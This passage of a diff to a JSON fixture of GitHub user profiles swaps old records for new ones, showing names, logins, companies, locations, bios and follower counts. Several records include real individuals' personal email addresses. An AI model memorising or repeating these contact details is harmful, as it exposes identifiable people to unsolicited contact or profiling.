0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-04-20T18:36:22Z", - "updated_at": "2022-05-24T13:42:00Z", - "node_id": "MDQ6VXNlcjQ5ODE5NjIw", - "bio": "", + "following_count": 1, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 12, + "created_at": "2017-05-19T11:14:36Z", + "updated_at": "2024-08-19T05:53:03Z", + "node_id": "MDQ6VXNlcjI4ODA1Nzc4", + "bio": "Interested in Machine Learning, Security, Python, Golang", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1839, + "pk": 7136, "fields": { - "nest_created_at": "2024-09-12T00:28:12.811Z", - "nest_updated_at": "2024-09-12T00:28:12.811Z", - "name": "Paul Wagland", - "login": "pwagland", + "nest_created_at": "2024-09-22T08:41:52.048Z", + "nest_updated_at": "2024-09-22T19:36:21.882Z", + "name": "Tim Walter", + "login": "twwd", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/748033?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8222565?v=4", + "company": "@iteratec", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, + "following_count": 42, + "followers_count": 14, "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2011-04-23T21:44:13Z", - "updated_at": "2024-05-17T16:57:46Z", - "node_id": "MDQ6VXNlcjc0ODAzMw==", + "public_repositories_count": 12, + "created_at": "2014-07-21T09:16:34Z", + "updated_at": "2024-09-13T10:48:18Z", + "node_id": "MDQ6VXNlcjgyMjI1NjU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406228,49 +664327,49 @@ }, { "model": "github.user", - "pk": 1840, + "pk": 7137, "fields": { - "nest_created_at": "2024-09-12T00:28:14.019Z", - "nest_updated_at": "2024-09-12T00:30:49.968Z", - "name": "Dmitriy Popov", - "login": "dmitry-weirdo", - "email": "dmitry.weirdo@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/15837869?v=4", - "company": "https://www.vorwerk.com/", - "location": "Düsseldorf", + "nest_created_at": "2024-09-22T08:41:53.699Z", + "nest_updated_at": "2024-09-22T19:26:36.485Z", + "name": "Rüdiger H.", + "login": "ruedih", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1642746?v=4", + "company": "@iteratec", + "location": "Hamburg", "collaborators_count": 0, - "following_count": 8, - "followers_count": 5, + "following_count": 6, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 31, - "created_at": "2015-11-13T18:57:20Z", - "updated_at": "2024-08-08T10:13:53Z", - "node_id": "MDQ6VXNlcjE1ODM3ODY5", - "bio": "", - "is_hireable": true, + "public_repositories_count": 1, + "created_at": "2012-04-14T10:38:18Z", + "updated_at": "2024-07-22T14:08:30Z", + "node_id": "MDQ6VXNlcjE2NDI3NDY=", + "bio": "has been traveling the world of software development for more than 10 years. Works as architect, is interested in new technologies and secure development.", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1841, + "pk": 7138, "fields": { - "nest_created_at": "2024-09-12T00:28:15.221Z", - "nest_updated_at": "2024-09-12T00:28:40.802Z", - "name": "Carmelo Scollo", - "login": "melo0187", + "nest_created_at": "2024-09-22T08:41:54.027Z", + "nest_updated_at": "2024-09-22T19:26:36.798Z", + "name": "Sofia", + "login": "sofi0071", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2528018?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/108736750?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 6, - "followers_count": 6, - "public_gists_count": 9, - "public_repositories_count": 26, - "created_at": "2012-10-10T12:08:55Z", - "updated_at": "2024-05-21T07:10:18Z", - "node_id": "MDQ6VXNlcjI1MjgwMTg=", + "following_count": 13, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2022-07-05T12:18:18Z", + "updated_at": "2024-06-12T13:51:38Z", + "node_id": "U_kgDOBnsw7g", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406278,24 +664377,24 @@ }, { "model": "github.user", - "pk": 1842, + "pk": 7139, "fields": { - "nest_created_at": "2024-09-12T00:28:17.245Z", - "nest_updated_at": "2024-09-12T00:28:17.245Z", + "nest_created_at": "2024-09-22T08:41:54.357Z", + "nest_updated_at": "2024-09-22T19:26:37.113Z", "name": "", - "login": "itsecforu", + "login": "fphoer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38696837?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/107252742?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 10, - "followers_count": 2, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2018-04-24T14:56:48Z", - "updated_at": "2024-02-07T08:08:13Z", - "node_id": "MDQ6VXNlcjM4Njk2ODM3", + "public_repositories_count": 3, + "created_at": "2022-06-10T10:50:53Z", + "updated_at": "2024-06-03T09:09:39Z", + "node_id": "U_kgDOBmSMBg", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406303,24 +664402,24 @@ }, { "model": "github.user", - "pk": 1843, + "pk": 7140, "fields": { - "nest_created_at": "2024-09-12T00:28:20.139Z", - "nest_updated_at": "2024-09-12T00:28:20.139Z", - "name": "Torsten Kruse", - "login": "TorstenKruse", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3072311?v=4", - "company": "@COMINTO", - "location": "", + "nest_created_at": "2024-09-22T08:41:54.680Z", + "nest_updated_at": "2024-09-22T19:26:37.422Z", + "name": "", + "login": "paulschmelzer", + "email": "paul.schmelzer@posteo.de", + "avatar_url": "https://avatars.githubusercontent.com/u/18718671?v=4", + "company": "iteratec ", + "location": "Germany", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2012-12-18T13:12:13Z", - "updated_at": "2023-06-28T13:47:24Z", - "node_id": "MDQ6VXNlcjMwNzIzMTE=", + "public_repositories_count": 3, + "created_at": "2016-04-28T11:06:03Z", + "updated_at": "2022-03-16T10:14:14Z", + "node_id": "MDQ6VXNlcjE4NzE4Njcx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406328,24 +664427,24 @@ }, { "model": "github.user", - "pk": 1844, + "pk": 7141, "fields": { - "nest_created_at": "2024-09-12T00:28:21.818Z", - "nest_updated_at": "2024-09-12T00:28:21.818Z", - "name": "Marc Schmid", - "login": "m4rc77", + "nest_created_at": "2024-09-22T08:41:55.024Z", + "nest_updated_at": "2024-09-22T19:43:15.503Z", + "name": "Jorge Estigarribia", + "login": "jorgestiga", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19596774?v=4", - "company": "@puzzle", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23637854?v=4", + "company": "", + "location": "Hamburg", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 11, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2016-05-26T18:54:53Z", - "updated_at": "2024-08-16T13:26:49Z", - "node_id": "MDQ6VXNlcjE5NTk2Nzc0", + "public_repositories_count": 0, + "created_at": "2016-11-21T15:47:57Z", + "updated_at": "2024-09-21T16:54:51Z", + "node_id": "MDQ6VXNlcjIzNjM3ODU0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406353,24 +664452,24 @@ }, { "model": "github.user", - "pk": 1845, + "pk": 7142, "fields": { - "nest_created_at": "2024-09-12T00:28:23.819Z", - "nest_updated_at": "2024-09-12T00:28:23.819Z", + "nest_created_at": "2024-09-22T08:41:55.369Z", + "nest_updated_at": "2024-09-22T19:26:38.076Z", "name": "", - "login": "Si-So", + "login": "Trosky", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/72555364?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/68395119?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-10-08T11:46:44Z", - "updated_at": "2024-03-15T14:06:23Z", - "node_id": "MDQ6VXNlcjcyNTU1MzY0", + "public_repositories_count": 0, + "created_at": "2020-07-16T17:47:48Z", + "updated_at": "2020-07-16T17:47:48Z", + "node_id": "MDQ6VXNlcjY4Mzk1MTE5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406378,49 +664477,49 @@ }, { "model": "github.user", - "pk": 1846, + "pk": 7143, "fields": { - "nest_created_at": "2024-09-12T00:28:25.029Z", - "nest_updated_at": "2024-09-12T00:28:25.029Z", - "name": "亂馬客", - "login": "rainmakerho", - "email": "rainmaker_ho@msn.com", - "avatar_url": "https://avatars.githubusercontent.com/u/11240907?v=4", - "company": "www.gss.com.tw", - "location": "taiwan", + "nest_created_at": "2024-09-22T08:41:55.715Z", + "nest_updated_at": "2024-09-22T19:26:38.387Z", + "name": "Guimo", + "login": "Spritekin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13467740?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 25, - "followers_count": 44, - "public_gists_count": 8, - "public_repositories_count": 156, - "created_at": "2015-02-28T05:57:12Z", - "updated_at": "2024-07-08T07:12:07Z", - "node_id": "MDQ6VXNlcjExMjQwOTA3", - "bio": "rainmaker_ho@gss.com.tw\r\n\r\nhttps://rainmakerho.github.io/\r\nhttps://dotblogs.com.tw/rainmaker/\r\n\r\nhttps://www.slideshare.net/rainmakerho", + "following_count": 0, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2015-07-23T12:16:52Z", + "updated_at": "2024-09-17T12:44:13Z", + "node_id": "MDQ6VXNlcjEzNDY3NzQw", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1847, + "pk": 7144, "fields": { - "nest_created_at": "2024-09-12T00:28:26.251Z", - "nest_updated_at": "2024-09-12T00:28:26.251Z", - "name": "", - "login": "pajinator", + "nest_created_at": "2024-09-22T08:41:56.040Z", + "nest_updated_at": "2024-09-22T19:26:38.726Z", + "name": "Florian Buchmeier", + "login": "fbuchmeier-abi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/110091141?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/55183594?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-07-27T08:01:34Z", - "updated_at": "2023-05-05T10:23:23Z", - "node_id": "U_kgDOBo_bhQ", + "public_repositories_count": 29, + "created_at": "2019-09-11T08:35:41Z", + "updated_at": "2024-08-27T08:18:46Z", + "node_id": "MDQ6VXNlcjU1MTgzNTk0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406428,14 +664527,14 @@ }, { "model": "github.user", - "pk": 1848, + "pk": 7145, "fields": { - "nest_created_at": "2024-09-12T00:28:27.469Z", - "nest_updated_at": "2024-09-12T00:28:27.469Z", + "nest_created_at": "2024-09-22T08:41:56.364Z", + "nest_updated_at": "2024-09-22T19:26:39.092Z", "name": "", - "login": "wenjunattech", + "login": "luckolen-secura", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/103624854?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/81567615?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -406443,9 +664542,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2022-04-14T05:42:33Z", - "updated_at": "2023-01-19T00:51:23Z", - "node_id": "U_kgDOBi0wlg", + "created_at": "2021-03-29T12:16:38Z", + "updated_at": "2021-06-21T12:45:55Z", + "node_id": "MDQ6VXNlcjgxNTY3NjE1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406453,24 +664552,24 @@ }, { "model": "github.user", - "pk": 1849, + "pk": 7146, "fields": { - "nest_created_at": "2024-09-12T00:28:28.680Z", - "nest_updated_at": "2024-09-12T00:28:28.680Z", + "nest_created_at": "2024-09-22T08:41:56.684Z", + "nest_updated_at": "2024-09-22T19:26:39.399Z", "name": "", - "login": "y25zhao", + "login": "rebeccan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/613827?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5824721?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 12, - "created_at": "2011-02-12T02:24:41Z", - "updated_at": "2023-01-19T04:37:54Z", - "node_id": "MDQ6VXNlcjYxMzgyNw==", + "public_repositories_count": 5, + "created_at": "2013-10-31T16:25:17Z", + "updated_at": "2023-01-17T09:11:18Z", + "node_id": "MDQ6VXNlcjU4MjQ3MjE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406478,24 +664577,24 @@ }, { "model": "github.user", - "pk": 1850, + "pk": 7147, "fields": { - "nest_created_at": "2024-09-12T00:28:30.347Z", - "nest_updated_at": "2024-09-12T00:28:30.347Z", - "name": "Craig Muchinsky", - "login": "cmuchinsky", + "nest_created_at": "2024-09-22T08:41:57.006Z", + "nest_updated_at": "2024-09-22T19:26:39.708Z", + "name": "Victor-Philipp Negoescu", + "login": "Victor-Philipp-Negoescu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23175991?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/39049312?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2016-10-31T19:01:59Z", - "updated_at": "2024-08-28T11:46:22Z", - "node_id": "MDQ6VXNlcjIzMTc1OTkx", + "created_at": "2018-05-07T08:55:36Z", + "updated_at": "2021-12-12T19:30:36Z", + "node_id": "MDQ6VXNlcjM5MDQ5MzEy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406503,24 +664602,24 @@ }, { "model": "github.user", - "pk": 1851, + "pk": 7148, "fields": { - "nest_created_at": "2024-09-12T00:28:32.337Z", - "nest_updated_at": "2024-09-12T00:35:51.180Z", - "name": "Volkert", - "login": "volkert-fastned", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47151527?v=4", - "company": "@Fastned ", - "location": "", + "nest_created_at": "2024-09-22T08:41:57.320Z", + "nest_updated_at": "2024-09-22T19:26:40.069Z", + "name": "Michael Peyerl", + "login": "michaelpeyerl", + "email": "michael.peyerl@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17581954?v=4", + "company": "", + "location": "Amstetten, Austria", "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2019-01-29T16:01:35Z", - "updated_at": "2024-04-24T15:24:35Z", - "node_id": "MDQ6VXNlcjQ3MTUxNTI3", + "public_repositories_count": 13, + "created_at": "2016-03-02T00:50:20Z", + "updated_at": "2024-06-02T13:16:30Z", + "node_id": "MDQ6VXNlcjE3NTgxOTU0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406528,74 +664627,74 @@ }, { "model": "github.user", - "pk": 1852, + "pk": 7149, "fields": { - "nest_created_at": "2024-09-12T00:28:33.541Z", - "nest_updated_at": "2024-09-12T00:28:33.541Z", - "name": "", - "login": "2fortunately", + "nest_created_at": "2024-09-22T08:41:57.953Z", + "nest_updated_at": "2024-09-22T19:35:59.894Z", + "name": "Renato Burton", + "login": "srburton", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/54020692?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15394508?v=4", + "company": "Zup inovation", + "location": "Brasil, Limeira - SP", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2019-08-12T08:08:48Z", - "updated_at": "2024-08-28T19:32:24Z", - "node_id": "MDQ6VXNlcjU0MDIwNjky", + "following_count": 103, + "followers_count": 13, + "public_gists_count": 2, + "public_repositories_count": 146, + "created_at": "2015-10-30T03:05:42Z", + "updated_at": "2024-07-25T20:27:02Z", + "node_id": "MDQ6VXNlcjE1Mzk0NTA4", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1853, + "pk": 7150, "fields": { - "nest_created_at": "2024-09-12T00:28:34.779Z", - "nest_updated_at": "2024-09-12T00:28:34.779Z", - "name": "Richard Seeton", - "login": "rseeton", + "nest_created_at": "2024-09-22T08:41:58.273Z", + "nest_updated_at": "2024-09-22T19:26:41.058Z", + "name": "Felix Hoffmann", + "login": "zzzFelix", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8129464?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19827840?v=4", + "company": "@volkswagen", + "location": "Hamburg", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 21, - "created_at": "2014-07-10T22:17:35Z", - "updated_at": "2024-06-14T11:44:38Z", - "node_id": "MDQ6VXNlcjgxMjk0NjQ=", + "following_count": 6, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2016-06-08T22:42:53Z", + "updated_at": "2024-06-28T18:54:05Z", + "node_id": "MDQ6VXNlcjE5ODI3ODQw", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "felixmhoffmann" } }, { "model": "github.user", - "pk": 1854, + "pk": 7151, "fields": { - "nest_created_at": "2024-09-12T00:28:35.993Z", - "nest_updated_at": "2024-09-12T00:28:35.993Z", - "name": "Jurrie Overgoor", - "login": "Jurrie", + "nest_created_at": "2024-09-22T08:41:58.590Z", + "nest_updated_at": "2024-09-22T19:26:41.377Z", + "name": "Martin Lang", + "login": "MartinLang1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1213142?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27353397?v=4", + "company": "iteratec GmbH", + "location": "Germany", "collaborators_count": 0, - "following_count": 12, - "followers_count": 10, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 53, - "created_at": "2011-11-22T14:34:45Z", - "updated_at": "2024-09-06T08:04:58Z", - "node_id": "MDQ6VXNlcjEyMTMxNDI=", + "public_repositories_count": 0, + "created_at": "2017-04-12T12:50:58Z", + "updated_at": "2023-11-24T12:47:08Z", + "node_id": "MDQ6VXNlcjI3MzUzMzk3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406603,49 +664702,49 @@ }, { "model": "github.user", - "pk": 1855, + "pk": 7152, "fields": { - "nest_created_at": "2024-09-12T00:28:37.175Z", - "nest_updated_at": "2024-09-12T00:28:37.175Z", - "name": "Patrick Böder", - "login": "Purii", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7056989?v=4", - "company": "Porsche Digital", - "location": "Ludwigsburg, Germany", + "nest_created_at": "2024-09-22T08:41:59.228Z", + "nest_updated_at": "2024-09-22T19:26:42.005Z", + "name": "Michael Zeevi", + "login": "maze88", + "email": "maze@fastmail.net", + "avatar_url": "https://avatars.githubusercontent.com/u/16841581?v=4", + "company": "Nvidia", + "location": "Israel", "collaborators_count": 0, - "following_count": 39, - "followers_count": 68, + "following_count": 8, + "followers_count": 11, "public_gists_count": 1, - "public_repositories_count": 30, - "created_at": "2014-03-25T09:47:03Z", - "updated_at": "2024-09-06T11:44:21Z", - "node_id": "MDQ6VXNlcjcwNTY5ODk=", - "bio": "I build software for people. – personal account.\r\n", + "public_repositories_count": 17, + "created_at": "2016-01-22T17:40:32Z", + "updated_at": "2024-09-20T11:40:03Z", + "node_id": "MDQ6VXNlcjE2ODQxNTgx", + "bio": "This GitHub account is only for forks and work. My main Git is on: https://codeberg.org/maze", "is_hireable": false, - "twitter_username": "whoispurii" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1856, + "pk": 7153, "fields": { - "nest_created_at": "2024-09-12T00:28:42.864Z", - "nest_updated_at": "2024-09-12T00:28:42.864Z", - "name": "Sigrid Andersson", - "login": "sigand", + "nest_created_at": "2024-09-22T08:41:59.862Z", + "nest_updated_at": "2024-09-22T19:26:42.638Z", + "name": "", + "login": "tbrixen", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/17898038?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2179579?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-03-17T07:20:28Z", - "updated_at": "2024-08-20T10:07:49Z", - "node_id": "MDQ6VXNlcjE3ODk4MDM4", + "following_count": 5, + "followers_count": 3, + "public_gists_count": 6, + "public_repositories_count": 23, + "created_at": "2012-08-19T18:35:57Z", + "updated_at": "2024-09-20T07:12:27Z", + "node_id": "MDQ6VXNlcjIxNzk1Nzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406653,24 +664752,24 @@ }, { "model": "github.user", - "pk": 1857, + "pk": 7154, "fields": { - "nest_created_at": "2024-09-12T00:28:44.067Z", - "nest_updated_at": "2024-09-12T00:28:44.067Z", - "name": "", - "login": "djeanprost", + "nest_created_at": "2024-09-22T08:42:00.190Z", + "nest_updated_at": "2024-09-22T19:26:42.960Z", + "name": "Daniel Patanin", + "login": "dpatanin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2271557?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/44839597?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 2, - "created_at": "2012-09-03T15:02:21Z", - "updated_at": "2024-08-28T07:43:44Z", - "node_id": "MDQ6VXNlcjIyNzE1NTc=", + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2018-11-07T13:23:25Z", + "updated_at": "2024-09-06T10:55:05Z", + "node_id": "MDQ6VXNlcjQ0ODM5NTk3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406678,24 +664777,24 @@ }, { "model": "github.user", - "pk": 1858, + "pk": 7155, "fields": { - "nest_created_at": "2024-09-12T00:28:45.266Z", - "nest_updated_at": "2024-09-12T00:29:39.868Z", - "name": "", - "login": "Mridulau", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/43175836?v=4", + "nest_created_at": "2024-09-22T08:42:00.500Z", + "nest_updated_at": "2024-09-22T19:26:43.317Z", + "name": "Kamiren Dawkins", + "login": "kamirendawkins", + "email": "kamiren@dawkins.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/19929464?v=4", "company": "", - "location": "", + "location": "Boston, MA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, + "following_count": 16, + "followers_count": 6, + "public_gists_count": 1, "public_repositories_count": 1, - "created_at": "2018-09-11T13:27:18Z", - "updated_at": "2023-11-20T10:38:16Z", - "node_id": "MDQ6VXNlcjQzMTc1ODM2", + "created_at": "2016-06-14T12:13:48Z", + "updated_at": "2024-09-05T22:32:03Z", + "node_id": "MDQ6VXNlcjE5OTI5NDY0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406703,49 +664802,49 @@ }, { "model": "github.user", - "pk": 1859, + "pk": 7156, "fields": { - "nest_created_at": "2024-09-12T00:28:46.457Z", - "nest_updated_at": "2024-09-12T00:28:46.457Z", - "name": "Jkbang", - "login": "bjk7119", + "nest_created_at": "2024-09-22T08:42:00.828Z", + "nest_updated_at": "2024-09-22T19:26:43.653Z", + "name": "Patryk Miłek", + "login": "patrykzzz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/81218204?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16317520?v=4", "company": "", - "location": "", + "location": "Poland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, + "following_count": 1, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2021-03-23T07:23:58Z", - "updated_at": "2024-08-27T02:55:48Z", - "node_id": "MDQ6VXNlcjgxMjE4MjA0", - "bio": "", + "public_repositories_count": 13, + "created_at": "2015-12-16T07:35:20Z", + "updated_at": "2024-09-13T10:59:38Z", + "node_id": "MDQ6VXNlcjE2MzE3NTIw", + "bio": ".NET developer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1860, + "pk": 7157, "fields": { - "nest_created_at": "2024-09-12T00:28:48.073Z", - "nest_updated_at": "2024-09-12T00:29:09.406Z", + "nest_created_at": "2024-09-22T08:42:01.139Z", + "nest_updated_at": "2024-09-22T19:26:43.974Z", "name": "", - "login": "Emilien-S", + "login": "frickeo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/116187542?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6763780?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-10-19T15:06:50Z", - "updated_at": "2022-10-19T15:06:50Z", - "node_id": "U_kgDOBuzhlg", + "public_repositories_count": 12, + "created_at": "2014-02-23T16:02:13Z", + "updated_at": "2024-06-14T06:07:23Z", + "node_id": "MDQ6VXNlcjY3NjM3ODA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406753,49 +664852,49 @@ }, { "model": "github.user", - "pk": 1861, + "pk": 7158, "fields": { - "nest_created_at": "2024-09-12T00:28:50.485Z", - "nest_updated_at": "2024-09-12T00:28:50.485Z", - "name": "Amit Agarwal", - "login": "raj77in", + "nest_created_at": "2024-09-22T08:42:02.094Z", + "nest_updated_at": "2024-09-22T19:35:21.511Z", + "name": "Matthew Cascio", + "login": "cybercapsicum", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3305948?v=4", - "company": "Individual", - "location": "India", + "avatar_url": "https://avatars.githubusercontent.com/u/22627989?v=4", + "company": "cybercapsicum", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 41, - "created_at": "2013-01-18T12:16:33Z", - "updated_at": "2024-08-25T07:21:14Z", - "node_id": "MDQ6VXNlcjMzMDU5NDg=", - "bio": "", + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 6, + "created_at": "2016-10-05T00:26:37Z", + "updated_at": "2024-09-17T16:22:59Z", + "node_id": "MDQ6VXNlcjIyNjI3OTg5", + "bio": "AppSec and pepper can coexist.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1862, + "pk": 7159, "fields": { - "nest_created_at": "2024-09-12T00:28:52.917Z", - "nest_updated_at": "2024-09-12T00:28:52.917Z", - "name": "Matt Colman", - "login": "mtcolman", + "nest_created_at": "2024-09-22T08:42:02.441Z", + "nest_updated_at": "2024-09-22T19:26:45.358Z", + "name": "Lyuben Dimitrov", + "login": "ldimitrov", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/33348891?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2116833?v=4", "company": "", - "location": "", + "location": "Munich Area", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2017-11-03T12:14:34Z", - "updated_at": "2024-03-18T08:30:11Z", - "node_id": "MDQ6VXNlcjMzMzQ4ODkx", + "followers_count": 5, + "public_gists_count": 5, + "public_repositories_count": 52, + "created_at": "2012-08-08T13:13:00Z", + "updated_at": "2023-12-26T09:44:06Z", + "node_id": "MDQ6VXNlcjIxMTY4MzM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -406803,74 +664902,99 @@ }, { "model": "github.user", - "pk": 1863, + "pk": 7160, "fields": { - "nest_created_at": "2024-09-12T00:28:55.331Z", - "nest_updated_at": "2024-09-12T00:28:55.331Z", - "name": "Rahma Douma", - "login": "DoumaRahma", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/76129186?v=4", - "company": "Dejardins", - "location": "Montréal", + "nest_created_at": "2024-09-22T08:42:02.778Z", + "nest_updated_at": "2024-09-22T19:26:45.673Z", + "name": "Luc Kolen", + "login": "luckolen", + "email": "Luckolen+github@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/678666?v=4", + "company": "Rabobank", + "location": "Tilburg", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 2, + "public_repositories_count": 1, + "created_at": "2011-03-19T13:29:27Z", + "updated_at": "2024-08-26T07:56:48Z", + "node_id": "MDQ6VXNlcjY3ODY2Ng==", + "bio": "", + "is_hireable": false, + "twitter_username": "luckolen" + } +}, +{ + "model": "github.user", + "pk": 7161, + "fields": { + "nest_created_at": "2024-09-22T08:42:03.090Z", + "nest_updated_at": "2024-09-22T19:26:45.984Z", + "name": "Cintia Sánchez García", + "login": "cynthia-sg", + "email": "cynthiasg@icloud.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1440981?v=4", + "company": "@thelinuxfoundation", + "location": "Spain", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 42, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-12-16T20:13:31Z", - "updated_at": "2024-06-02T15:55:05Z", - "node_id": "MDQ6VXNlcjc2MTI5MTg2", - "bio": "Analyste-programmeuse", + "public_repositories_count": 57, + "created_at": "2012-02-15T19:41:26Z", + "updated_at": "2024-08-26T07:47:41Z", + "node_id": "MDQ6VXNlcjE0NDA5ODE=", + "bio": "Working on awesome projects with my teammate @tegioz. Now building Artifact Hub, CLOMonitor, CLOTributor, 